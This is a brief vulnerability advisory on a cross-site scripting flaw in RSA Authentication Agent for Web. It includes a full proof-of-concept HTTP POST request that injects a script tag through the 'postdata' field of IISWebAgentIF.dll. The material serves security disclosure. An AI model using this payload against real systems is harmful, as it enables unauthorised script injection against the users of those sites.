|
RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been made available: POST /WebID/IISWebAgentIF.dll HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* Accept-Language: de Content-Type: application/x-www-form-urlencoded Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.example.com Cache-Control: no-cache Referer: https://www.example.com/ Content-Length: 135 stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6 |
|
|
Privacy Statement |
